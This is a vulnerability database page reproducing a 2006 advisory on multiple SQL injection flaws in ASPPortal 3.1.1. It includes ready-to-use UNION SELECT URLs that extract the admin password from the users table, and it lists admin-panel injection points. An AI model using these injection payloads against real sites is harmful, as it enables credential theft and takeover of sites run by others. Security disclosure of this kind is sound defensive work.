|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 608 CVE : CVE-2006-1353 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : nukedx Published : 23.03.2006
Advisory Text : --Security Report-- Advisory: ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 20/03/06 11:14 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: ASPPortal (http://www.ASPPortal.net/) Version: 3.1.1 and prior versions must be affected. About: There is lots of SQL injections in modules of ASPPortal via this methods remote attacker can inject arbitrary SQL queries.In below i included some with their examples and also coded exploit for second one exploit decrypts password which comes from SQL injection too, Because ASPPortal has it own crypting mechanism.As you can see in downloads module page download_click.asp's downloadid parameter and news module page News_Item.asp's content_ID parameter did not sanitized properly.Also there is some SQL injections in admin panel but for using them you need admin access.You can found them in below as ADMINGET and ADMINPOST tags. Level: Critical --- How&Example: GET -> http://[site]/apdir/content/downloads/download_click.asp?downloadid=[SQL Code] GET -> http://[site]/apdir/content/news/News_Item.asp?content_ID=[SQLCode] Example -> http://[site]/apdir/content/downloads/download_click.asp?downloadid=-1+U NION+SELECT+0,0,0,0,0,0,0,0,0,0, password+FROM+users+where+username='admin' Example -> http://[site]/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELEC T+username,password,0,0, group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin' With this examples remote attacker could get admin's pass and can login from /content/users/login.asp ADMINGET -> http://[site]/apdir/content/users/add_edit_user.asp?page_type=2&user_id= [SQLCode] ADMINGET -> http://[site]/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&b annerid=[SQLCode] ADMINGET -> http://[site]/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_ id=[SQLCode] ADMINGET -> http://[site]/apdir/content/News/add_edit_news.asp?page_type=2&Content_I D=[SQLCode] ADMINGET -> http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=2& download_id=[SQLCode] ADMINGET -> http://[site]/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[ SQLCode] ADMINGET -> http://[site]/apdir/content/contactus/contactus_add_edit.asp?contactid=[ SQLCode]&pageid=2 ADMINGET -> http://[site]/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no= 1 ADMINPOST -> http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=1 -- Timeline: * 20/03/2006: Vulnerability found. * 20/03/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=21 --- References: http://www.milw0rm.com/id.php?id=1597 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=21  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |